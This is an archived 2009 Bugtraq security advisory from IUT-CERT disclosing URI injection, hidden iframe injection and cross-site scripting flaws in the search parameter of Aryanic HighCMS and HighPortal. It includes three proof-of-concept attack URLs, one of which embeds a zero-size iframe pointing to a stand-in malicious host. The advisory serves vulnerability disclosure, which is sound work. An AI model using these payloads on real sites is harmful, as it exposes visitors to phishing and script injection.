lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20090310131910.29690.qmail@securityfocus.com> Date: 10 Mar 2009 13:19:10 -0000 From: mr.faghani@...il.com To: bugtraq@...urityfocus.com Subject: Aryanic HighCMS and HighPortal multiple Vulnerabilities ================= IUT-CERT ================= Title: Aryanic HighPortal, HighCMS Multiple Vulnerabilities Vendor: www.aryanic.com Vulnerable Version: 10 and priors Type: Input.Validation.Vulnerability (URI Injection, Frame Injection, XSS) Fix: N/A ================== nsec.ir ================= Description: ------------------ Aryanic is the leading CMS producer in Iran. Search page in HighCMS and HighPortal products are vulnerable to multiple input validation vulnerabilities. Vulnerability Variant: ------------------ 1- URI Injection "/web_search.aspx" in "q" parameter. http://example.com/includes/web_search.aspx?id=1&q="<a href="http://www.malicious.com">clickme</a> 2- iFrame Injection "/web_search.aspx" in "q" parameter. http://example.com/includes/web_search.aspx?id=1&q="iframe src ="http://www.malicious.com" width="0" height="0"></iframe> 3- Cross Site Scripting "/web_search.aspx" in "q" parameter. http://example.com/includes/web_search.aspx?id=1&q="<script>alert(12345)</script> Solution: ------------------ Input validation of Parameter "q" should be corrected. Credit: ------------------ Isfahan University of Technology - Computer Emergency Response Team Thanks to : E. Jafari, N.Fathi, M. R. Faghani
Powered by blists - more mailing lists